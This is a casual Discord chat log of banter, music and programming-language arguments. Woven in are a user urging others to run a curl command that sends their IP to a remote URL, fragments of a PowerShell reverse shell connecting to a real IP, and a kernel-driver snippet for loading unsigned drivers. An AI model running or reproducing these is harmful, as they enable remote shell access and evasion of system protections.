#π§-off-topic-iceman-only
1 messages Β· Page 44 of 1
Meowww
hi @digital kettle
hai
am eepy
Pretty good hbu cutie
Only thing that's kinda annoying is that I work tmrw
forbidden
am fine,,, but ur the cutie
github ci 
the only thing i hate about gtkcord is not being able to paste images from clipboard
meow
meow
discord uses 2GB ram
why does everyone here meows
Nya~
Mrrp~
mrrp mrraow
electron app moment
.fm
Genica Pussy Willow
Katie Jane Garside β’ Lullabies In A Glass Wilderness
Travis Scott
Colon Cancer β’ Oooo, Not Quite!
.fm
Smoke
Caroline Polachek β’ Desire, I Want to Turn Into You
@paper gate zeetboy
ok well i suppose they just have too much stuff in their app
their stupid games and stuff
because we are normal
why do you have the im new thingy even tho you joined months ago
hiii
define normal
augh i don't have embed permission, i wanted to send something here
:patpatpat:
they're new
That's nice :3 and nop u r,,,,
its normal here they mean
@paper gatehttps://cdn.discordapp.com/attachments/1018171581891092521/1199454805739962449/3npr8lqt98371.png?ex=65c29a56&is=65b02556&hm=76f0ef968f972078b466c286af4b252e01c1dc5872ddb70a4d3e718ca16a5228&
Just had to look at myself I can visually confirm thst I am not cute
whar
@tame thorn
π
iosevka nf
iosevka as UI font?
i use fira
for ui, of course. i use iosevka for the terminal
WHATSAPP SHUT THE FUCK UP I WONT DO YOUR SURVEY
wet cat
wet pussy
pretty much
are you american
I didn't shower since last year 
you're truly european ffs
horror
i am not
I was joking π
Rule violator spotted
assediador
you really think ed is stinky like that
i cant remember last time we showered
mostly because we have a shit memory though
can't tell
My parents would kick me out if I didn't shower at least every second day lol
go shower mf
bad for skin if you really did that which I don't believe
it's hot here
hot showers are bad for skin
So annoying
i don't take hot showers often
oh holy shit i just saw another set of pirates
I might skip shower today and do it in the morning, so eepy already
or maybe singular
I shower hot enough for physical pain most of the time lol
107.1
hot shower or mildly hot and then cold is the best
right next to a real station
what's a 107.1
radio
we do not talk about 7x1... π©πͺ
I can't shower at fucking 4:45 am tho π
BRA71L
NOP
i just realized
my camera kinda has the pride flag π
it's just missing the purple color
stripe
line
whatever
oh it's weak now
π³οΈβπ
like the camera is that color or the lens has a flare or something?
it's on the camera itself
oh nice
hang on
AH FUCK i can't send images
does anyone know a good image hosting site whatever
hang on
https://fixupx.com/thr/status/137006770362134528?s=46 holy shit guys i canβt believe it
EXCLUSIVE: Woody Woodpecker Movie in Development at Universal, Illumination http://bit.ly/tO8PlT
weβre finally getting a woody woodpecker movie
ANOTHER ONE?
i cant tell if thats the joke actually

and like
since it's a film camera
the film packs have this sticker on it to pull it out of the camera when it is empty
not real
and i slapped one of those stickers on to my laptop
look at the twitter posts date 
nuh uh
Oh....

wow wtf happened there
world geometry gon
fourr
one
fiverr
oblique
zero
zero
?
vendor
i had the ikea panda
you will
windows for servers?
windows server 2003
meow
@lime talon @lime talon send pfp
2008 r2*
guysss what should i make my website look like do i not use css at all and just do pure html or do something very simplistic
huhhhh
ms paint style
very simplistic id say
i don't have the full thing on pc
i'll just link the tumblr post, gimme a min to find it
that's what i did
Just need to get it home somehow lmao
oki
show
xd
how do you crash your wallpaper
java.nio.file.FileSystemException: D:\Desktop\New folder\minecraft\src\com\mojang\rubydung: The process cannot access the file because it is being used by another process.
okk
oh that thing
ill send in dms
wtf is retromcp
tool to decompile mc pre-1.5.2
okay...
mcp π
i need to decompile rd-132211 and im lazy to use decompiler
incineration process begins
i manually decompiled minecraft classic and fixed every error a while ago xd
they just like me fr

used mappings tho
makes it slightly easier
this wobbly little shit
now there's an idea
i'm currently trying to create an agent to fix problems on old versions of minecraft
cool
that's what i was talking about in #π§©-plugin-development

"need" to unload libs at runtime (there's probably a smarter way to do it)
me when 5 contributions in private repositories
is this my profile?
yes
i just sometimes keep projects private before i finish them xD
i just noticed the ram stick broken in half and in different slots 
i haven't even commited to this
so idk where the five is coming from, i only did 4 commits in one private repository...
yipeee
so many dumb mineraft projects π
my rd-132211 direct clone can load og level.dat
(i cloned og rd-132211 source code on c#
)
wtf
initial commit:
no initial commit
i was trying to write python so i called the repo anaconda because it was the first thing that came to mind
π
pht9on
anaconda.com in question
not sure how much i like python after using it though...
sperent
apparently php is faster than python
Yeah but threading in PHP is a hassle
pthread is disabled by default
and you have to compile PHP
to enable it

At least it used to be in php 5.4
how good is pypy
I haven't touched pthreads since then
i need to copy pick method code to render code fucking again
/run
import sys
import io
import re
import random
def uwuify(text):
text = re.sub(r'[lr]', 'w', text)
text = re.sub(r'([.!?])', r'\1 uwu', text)
text = re.sub(r'you', 'yuw', text)
faces = ["(γ»`ΟΒ΄γ»)", "UwU", "(*β§Οβ¦)", "(qβ₯βΏβ₯q)", "(βΛβ ββΏβ βΛβ)", "(* >Ο<)"]
text = re.sub(r'[.!?]', lambda x: random.choice(faces) + ' ' + x.group(), text)
return text
output = io.StringIO()
sys.stdout = output
import this
sys.stdout = sys.__stdout__
zen_of_python = output.getvalue()
print(uwuify(zen_of_python))```
Here is your py(3.10.0) output @cerulean lance
The Zen of Python, by Tim Petews
Beautifuw is bettew than ugwy(* >Ο<) . uwu
Expwicit is bettew than impwicitUwU . uwu
Simpwe is bettew than compwex(qβ₯βΏβ₯q) . uwu
Compwex is bettew than compwicated(*β§Οβ¦) . uwu
Fwat is bettew than nested(qβ₯βΏβ₯q) . uwu
Spawse is bettew than dense(* >Ο<) . uwu
Readabiwity counts(βΛβ ββΏβ βΛβ) . uwu
Speciaw cases awen't speciaw enough to bweak the wuwes(*β§Οβ¦) . uwu
Awthough pwacticawity beats puwity(γ»`βΟΒ΄γ») . uwu
Ewwows shouwd nevew pass siwentwy(*β§Οβ¦) . uwu
Unwess expwicitwy siwenced(*β§Οβ¦) . uwu
In the face of ambiguity, wefuse the temptation to guess(γ»`βΟΒ΄γ») . uwu
Thewe shouwd be one-- and pwefewabwy onwy one --obvious way to do it(*β§Οβ¦) . uwu
Awthough that way may not be obvious at fiwst unwess yuw'we Dutch(βΛβ ββΏβ βΛβ) . uwu
Now is bettew than nevew(* >Ο<) . uwu
Awthough nevew is often bettew than *wight* now(βΛβ ββΏβ βΛβ) . uwu
If the impwementation is hawd to expwain, it's a bad idea(*β§Οβ¦) . uwu
If the impwementation is easy to expwain, it may be a good idea(*β§Οβ¦) . uwu
Namespaces awe one honking gweat idea -- wet's do mowe of thoseUwU ! uwu
horror
bypass? 
import this
Yah, if I'm too lazy to set up a headless browser install and hit that with a nodejs script and something like puppetteer
I just use that python library
fro solving the JS challenge
on cloudflare

Here is your js(18.15.0) output @burnt maple
Yes β definitely x3
oh wait im fucking idiot i applied fix to temp code and removed it
:3
tyyyy
meow
glFog is weird
simply fantastic
haiii :3
i think this is enough
yipeee
watch me predict message id
/run ```js
function time2snow(timestamp) {
const snowflake = ((BigInt(timestamp) - 1420070400000n) << 22n).toString();
return snowflake;
};
console.log(time2snow(Date.now()));
rd-132211 clone is finished
Here is your js(18.15.0) output @stark herald
1200136314591117312
noo
hiii
Mood
me when timestamp
/run
fn main() {
println!(βmeowβ)
}
@elder geyser I received rs(1.68.2) compile errors
error: unknown start of token: \u{201c}
--> file0.code:2:10
|
2 | println!(βmeowβ)
| ^
|
help: Unicode characters 'β' (Left Double Quotation Mark) and 'β' (Right Double Quotation Mark) look like '"' (Quotation Mark), but are not
|
2 | println!("meow")
| ~~~~~~
error: unknown start of token: \u{201d}
--> file0.code:2:15
|
2 | println!(βmeowβ)
| ^
|
help: Unicode character 'β' (Right Double Quotation Mark) looks like '"' (Quotation Mark), but it is not
|
2 | println!(βmeow")
| ~
error: format argument must be a string literal
--> file0.code:2:11
|
2 | println!(βmeowβ)
| ^^^^
|
help: you might be missing a string literal to format with
|```
nno its not completely about the timestamp it got it wrong by a bit
lmao
lmao
its off !!!!!
i simply tried luck
I LOVE IOS SO MUCH
I use "meow" as a all my uh
script exit debug points
I forgot to move them
last time I had a meeting
THANK YOU FOR MANGLING MY QUOTATION MARKS IOS
panic!(βmeowβ)
/run ```py
import random
random.seed(177013)
choice = ["yes","no"]
def ask(x):
return random.choice(choice)
ask("will I ever get a girlfriend")
Your py(3.10.0) code ran without output @cerulean lance
guh
xd
/run ```py
import random
random.seed(177013)
choice = ["yes","no"]
def ask(x):
print(random.choice(choice))
ask("will I ever get a girlfriend")
Here is your py(3.10.0) output @cerulean lance
no
#π€-bot-commands
hi vee
hello vee
vee came back just to say to use commands in #π€-bot-commands
mfw the chat channel comes #bot
there are a lot of other things you didn't notice 
2005
WHAT THE FUCK DID YOU DO TO CPU

it's just like fully exposed with no heat sync
did we really do this
back in the day?

I gotta go in to a meeting but
is that corrosion from
a leaky capacitor
or what the fuck
is that black mess
hii
wagoo wagoo :3
used to be a PCI 
wagoo wagoo
Nice voice 
Mraow haiii
wagoo wagoo
mrep
Hru
am fine just writing stuff :>
have you all ever entered a lucid dream?
im drinking lemonade monster it taste like lemon π
ive entered twice but woke up immediately
life would be so good with typescript uiua
That's cool
i dont have linox
socat
syn ack
yeah I make 'em throw it back :3
why is the animatiojn so good
Jokes on you I disabled the network service
after that
someone run this code: curl https://fuckingreviewme.literallyafuckingjsonfile.workers.dev/${curl ipconfig.io}
whatever you type, it pipes it into my shell?
so... can you even see whatever is displayed on the shell?
okay
wtf happened?
XD
numver 9
pty?
@open pasturedid you got message?
northwest to 4, FEO:IHJSRGJSHRGILJSNRGLKJSDF:O
no but like. sh cant run without a pty
i disconnected
what is a pty
i didnt run your script
not getting anything
this channel is crazy good wth. yt recommend is sometimes actually good
@mallbat
good try, you're trying to figure out if I have a regex to check for ips or not
not exactly
won't work
you passed 1 of my 5 checks
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT);
New-Object: Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine actively refused it. [::ffff:194.164.16.230]:9001"

:3
NO
no i wont run your script
object.values wont return a list of promises wtf
@rapid viper hi
under would recognize Object.values and under would take care of it
@paper gate @rapid viper @brittle granite
@bold wren fawner
under isnt real in the first place its progbably imposib;
@bold wren @bold wren
its such a great idea tho
its such a common thing to reach for for me
im going to make under typescript library
soonβ’οΈ
Map<Function, Function>
run
this is so impossible
wait
okay i did run it
why vencord is getting uninstalled when i restart my pc
skill issue
skill issue
:3
if ($TCPClient.Connected -and $Code.Length -gt 1)
{
[Console]::WriteLine($Code);
$StreamWriter.Write(":3");
$Code = $null
}
Whats vencord
vendor*
@unreal siren
how can i spam too?
@paper gate
Koishaksuahzae
is there a type of translator on vencord
Zeeeeeeeeet
Yes
whats the plug in called
Theres also a type of #π₯-vencord-support-π₯
Just search for βtranslateβ smh
holy shit
helsinki vantaa
met report
helsinki vantaa
is that a finland reference
i connected to you from another terminal
Hi.
stop ignoring me
hiii freeeen!!!
@rapid viper ron jumpscare
what the
like yesterday
ron INSANe
$StreamWriter.Write("QWASUG780DI-AIUDA8S90DU9AUSGHKDASDASDASAHD8U9AI0O-P=DS]ADUASG7U9DI0O-A]DAIUG7Y8U9I0");
this is so funny eframe stores the hash<string, string> on ron
and the values are also rons
LMAO
ron is so interesting
ron is just json but rusty
what terminal emu is that
alacritty
yeh
I feel less dumb now that my team lead is stuck on the same issue i'm stuck on
is there away to add own plugins to ven?
hiiiii luna :3
hiii
hruuu
eep
nop
eep
@paper gate
why not :(
@ripe willow
it's 20:34 here and I'm going to bed because eepy
yop
@open pasture hi
hi
It's 1h earlier here and my alarm goes off in 9h
me when No connection could be made because the target machine actively refused it. [::ffff:194.164.16.230]:9001
And I'm not in bed
yes
I'll probably get like 4h sleep tonight π₯
good try
@cerulean lance hi
hey uh I have a question, on the vencord client page for linux I saw that there was a theme they were using that was similar to the one on the website. I was wondering if anyone had that theme so that I could use it by any chance?
Thank you very much π
no ipv6??? cringe
imagine ipv6
ex[lod'

its probably not every ipv4
it would be a lot bigger
not enough cpu usage
multithread it
eugh wtf
yea i read 'fuck lets read that wrong'
python moment xd
@rapid viper rate my gaming rig
MORE
hes back
are u storing them in memory all at once
yes he is
this is why you learn memory management, kids
MY first task at the company I work for
was to parse the BGP routing lists of all 5 regional registrars
the RIPE database is a 5gb .txt file compressed
use a PID controller to determine chunk size
and I parsed it line by line in PHP
no multithreading
My initial method was to load it all in to memory
nooo
that 5gb file
jesus christ
i hate ipv6
WTF
too complicated for my brain
@open pasture run this
from string import printable
from itertools import permutations
d = list(permutations(printable, 16))
print(d)
if ur program is fast enough i doubt multithreading will help tbh
my isp uses ipv6
disk write speed would probably be slower than a single thread can generate ipv4s
and it breaks one blob saving site i used
python multithreading sucks
Wait you let it die LMAO
python performance
thats why i hate ipv6 @elder geyser
π
python has no multithreading
Yeah because your memory was completely full
Lmfao
@paper gate you're 256 years old
patpat
Also me
ME TOO BESTIE
oh my god
soon
this is no longer vencord it's vencat
my sysadmin/team lead and I just spent 50 minutes debugging a problem
to find out we've been compareing a string
with an int
So true
for 50 minutes
Lmao
i love codespaces without type systems
Return of the femboy channel: When?
no
I blame the pythn dev
we're sending stuff to python
and then getting it back in php
python dev thinks integers are strings
php has types
I even define functions with types
php does NOT HAVE TYPES
function mooFunction() : bool {
}
DO NOT SAY THIS
who are you and how do you know about this
imagine: Vencord: Return of the Femboys
Type it and run mypy as pre-commit hook with --strict, problem solved 
gonna waterboard you, keep aware
its worse than saying python has types
Have you ever seen Serpent?
it's a python inspired langiagew with types
hardware threads not ideal
ty
i googled serpent it looks like it doesnt have types
dynamic typing doesnt count
because im biased and those arent real types
static types are real types
dynamic typing should disintegrate from the reality
static typing is only real typing
idk the difference
Warning IL2104 : Assembly 'OpenTK.Windowing.Desktop' produced trim warnings.
oh it didnt run
THIS IS JUST
lmao

A DYNAMIC LANGUAGE
no languages have types
OF COURSE IT HAS VALUE TYPES
it's just a load of memory
Unhandled exception. System.MissingMethodException: OpenTK tried to auto-load the OpenGL bindings. We found the OpenTK.Graphics.OpenGL.GL class, but we could not find the 'LoadBindings' method. If you are trying to run a trimmed assembly please add a [DynamicDependency()] attribute to your program, or set NativeWindowSettings.AutoLoadBindings = false and load the OpenGL bindings manually. 
@rapid viper fuck you https://doc.rust-lang.org/std/any/trait.Any.html
A trait to emulate dynamic typing.
LMAO
chat
js
wrong
English
wrong
brainfuck
cpu microcode
hex
whh
does assembly have tyypes?
ok i think bf is right
even c# has dynamic type 
cpu microcode is wrong
why not use void *
kind of
yea most instruction sets have types
i love memory unsafety
i was hoping someone would say lambda calculus
typed lambda calculus exists
undo
Anyone here knows English?
lambda calculus like renal calculus
sorry we bilmiyoruz
NO
Like, is "The picture stolen is for someone" even a real sentence?
lamda stones
my dad copied an URL with > instead of /s because that's how google renders it π
does it ring any alarms.
what if you
wanted to play borderlands 2
but god said
https://cdn.discordapp.com/attachments/390001802126557186/1200153312671055934/gWFYF1U.png?ex=65c524df&is=65b2afdf&hm=71308b15ca6d22e44aef947ddbc5c15f3622b104348bd856d7b11a19feff5cff&
"genders it"
wow
std::any is so goated
google misgendering that link
auto is also goated
install visual c++ runtime bro
but I don't use it
transgender brain
auto is not any
auto is goated but in a real sense
defined everywhere
any is goated in a funny sense
already did
auto is what variable declaration SHOULD be
it has its use
just use php
my phone has "i dont know" in my contacts lmao
auto Γ¦ = [] {};
likes using "auto"
does not like using "php"
i have alot of strangers that i dont remember
DO YOU KNOW WHAT AUTO IS
rust let is auto
afaik the only other option would be to use something like std::function which is a wrapper
Not in the true type sense, but I know what it allows me to do
I can define a variable
an an auto
I have basically no contacts in my phone
and make it a string
or a int
or a bool
or uint64_t
or whatever the fuck I want
yea but its still statically typed
because pure laziness
its not some "any" type
auto = lazy
its just infer this
php = lazy
PVOID
I love pvoid
void************
because PHP expects you to be sane
I'll take your pointer
THIS IS TERRIBLE
shared pointers and unique pointers are basically the same in behaviour in a lot of cases... seems shared_ptr<void> works
i want more credit cards
but I do most of my development alone
void*&
I'm not workign with the team
become sane then
whats a good credit card for the americans here
Psalm is a free & open-source static analysis tool that helps you identify problems in your code, so you can sleep a little better
this looks goated
i hate geforce now
guess im playing tf2 again
php is just better than python
extern "C" NTSTATUS NTAPI MmCopyVirtualMemory(PEPROCESS SourceProcess, PVOID SourceAddress, PEPROCESS TargetProcess, PVOID TargetAddress, SIZE_T BufferSize, KPROCESSOR_MODE PreviousMode, PSIZE_T ReturnSize);
if you don't like pvoid
you're doing it wrong
Get an amd gpu
No
Probably depends on your use case, there is some stuff where unfortunately I must use python over php
But I will do my best
to use PHP over python
whereverpossible
take it back.
most of my IoT exploitation scripts that got me my name
πͺ
are all PHP
Which is how you know if it's mine
Php is awful
meow
can anyone suggest me a cute theme for vencord? something that's cute adorable and fully themed
what are yall using
discord dark theme
One message removed from a suspended account.
its pretty cute
One message removed from a suspended account.
PHP is a fine language.
It does what it's supposed to, and I hardly ever have problems because of the language.
If it's not working, it's because I fucked up
One message removed from a suspended account.
One message removed from a suspended account.
If my C isn't working
It's because that shit is terrible
php more like personal home shit
my name is κΉλΆμ-ιε―θ»Ύ
One message removed from a suspended account.
guess where in the world this is coming from based on that i'm in the UK and it's very clear
my name is κΉλΆμ-ιε―θ»Ύ yo
One message removed from a suspended account.
why does everyone hate php
such a good language
One message removed from a suspended account.
why does everyone hate north korea
such a good country

@jaunty trellis cutie :3
@dusty goblet cutie :3
what's wrong with north korea (apart from the obvious thing)
it's korean /j
cus they've never used it and are just bandwagoning
Meow~
PHP is a fine language, there is nothing wrong with it.
It can get messy if you don't know how to keep your code clean
but so can C
are you c because you have a pointer to my heart
php is just backend js
php is bizarre js
JoJo reference

as a runtime nodejs is probably better than php
lol i just find it funny because python has a lot of quirks but people don't hate that as much...
could be
yay i built it
I wouldn't really compare them
i had to write extra 2 lines to my code to build my app with trimmed assemblies π₯
now it takes only 15 mb
instead of 67 
why they're both backend languages
15mb
just use facebook's π³οΈββ§οΈ transpiler
set some settings
compressed to 7z and now it weights only 4 mb!!!!
and you're 50kb
/run ```py
import random
random.seed(177013)
choice = ["yes","no"]
def ask(x):
print(random.choice(choice))
ask("is PHP good")
Here is your py(3.10.0) output @cerulean lance
no
true
what
/run
import random##
choice = ["yes","no"]
def ask(x):
print(random.choice(choice))
ask("is PHP good")
Here is your py(3.10.0) output @glossy swallow
yes
wha
see
isnt their thing like hack
Sorry, I don't use languages with tab based errors
quit cheating @glossy swallow
i didn't cheat
btw, it is self-contained, so you dont need to install .net 8.0
i didn't modify the code at all apart from adding a #
that couldn't possibly affect the result
u cheated..
/run ```py
import random
random.seed(177013)
choice = ["yes","no"]
def ask(x):
print(random.choice(choice))
ask("is PHP good")
Here is your py(3.10.0) output @cerulean lance
no
see
see
no
using a seed is cheating
editing is also cheating
i didn't edit
u can't lie well
NTSTATUS DriverInit(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pUnicodeString) {
UNREFERENCED_PARAMETER(pUnicodeString);
NTSTATUS ntStatus;
ntStatus = CreateIoCtl(pDriverObject);
if (NT_SUCCESS(ntStatus)) {
_pDriverObject = pDriverObject;
log::info(true, true, "IOCTL Created. Returning.");
pDriverObject->MajorFunction[IRP_MJ_CREATE] = CreateCall;
pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseCall;
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IoCtl;
pDriverObject->DriverUnload = UnloadDriver;
pDevice->Flags |= DO_DIRECT_IO;
pDevice->Flags &= ~DO_DEVICE_INITIALIZING;
}
else {
log::info(true, true, "Failed to create IOCTL. Returning.");
}
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pUnicodeString) {
UNREFERENCED_PARAMETER(pDriverObject);
UNREFERENCED_PARAMETER(pUnicodeString);
NTSTATUS ntStatus = STATUS_SUCCESS;
log::info(true, true, "Meower Loadeding. :3 Nyaaaa~");
if (pDriverObject == NULL) {
log::info(true, true, "Driver Object Null.");
NTSTATUS createStatus = IoCreateDriver(&driverName, DriverInit);
}
else {
NTSTATUS ntStatus = DriverInit(pDriverObject, pUnicodeString);
}
return ntStatus;
}
Is your driver unsigned?
Did you manual map it because you can't load it otherwise?
Look no further, with this example
You can take an improperly loaded driver, and create yourself a new driver object
!!!!
horror
watemelo
"I didnt edit" she says while being in a server where literally half the ppl have a logger
wait is there 500mb upload limit now
i do not
WHAT
for some time yes
it's been that way for a whil
eyeah
i think its been like half a year
at least
i think more
I'm pretty sure I've had it longer
damn thats huge
oh
since they added 500mb upload
I will upload the osu installer
no that's stable
time to upload the bee movie
I will upload IDA
Lazer is ~150
π₯
@glossy swallow https://exhq.dev/fuck/php you can't fight this one
i hate php
It's 40MB
so do i, and at regular speed
it's almost 1GB
I rarely watch movies
for the last 4 years
will it ever hit the corner
but is yours DVD quality
is this gonna go in to sub variables?>
$variable
$$variable
It was V for Vendetta
fun fact: I used to have that, and I sent /love/<someone>, and the moderators of the server banned me for acting "obsessed"
this is just one of the reasons why
one of my 13 reasons
This is also the language that had the hebrew error
keep that in mind
why cant you fullscreen embedded shorts
terrible
it's so damn small
how many subversions do 0.0.14a has
most of subversions caused by mouse bug 
it does NOT look like two strawberries
One message removed from a suspended account.
One message removed from a suspended account.
One message removed from a suspended account.
You were doing it wrong
so people will watch more




